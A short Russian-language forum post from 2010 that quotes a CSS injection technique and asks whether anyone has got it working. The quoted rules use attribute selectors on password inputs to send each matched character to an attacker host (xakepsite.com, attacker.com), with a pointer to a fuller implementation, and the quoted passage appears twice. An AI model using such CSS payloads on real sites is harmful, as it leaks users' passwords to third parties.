goluzov
28.06.2010, 03:14
input[value*=“\x10”]{
background:url(“//xakepsite.com/?h=\x10”);
}
… и так далее …
input[value*=“\x7F”]{
background:url(“//attacker.com/?h=\x7F”);
}
Что это дает? Каждый раз, когда символ пароля попадает в диапазон 10-7F, отсылается соответствующий запрос. Таким образом, по выходу у нас будут все символы пароля. Останется только расположить их в нужном порядке. В реальной жизни диапазон в 111 символов можно расширить, а с помощью асинхронных включений CSS восстановить и последовательность символов. Тут я останавливаться не буду, пример реализации - eaea.sirdarckcat.net/cssar.
кто-нибудь пользовался таким? у меня почемуто не работает....
background:url(“//xakepsite.com/?h=\x10”);
}
… и так далее …
input[value*=“\x7F”]{
background:url(“//attacker.com/?h=\x7F”);
}
Что это дает? Каждый раз, когда символ пароля попадает в диапазон 10-7F, отсылается соответствующий запрос. Таким образом, по выходу у нас будут все символы пароля. Останется только расположить их в нужном порядке. В реальной жизни диапазон в 111 символов можно расширить, а с помощью асинхронных включений CSS восстановить и последовательность символов. Тут я останавливаться не буду, пример реализации - eaea.sirdarckcat.net/cssar.
кто-нибудь пользовался таким? у меня почемуто не работает....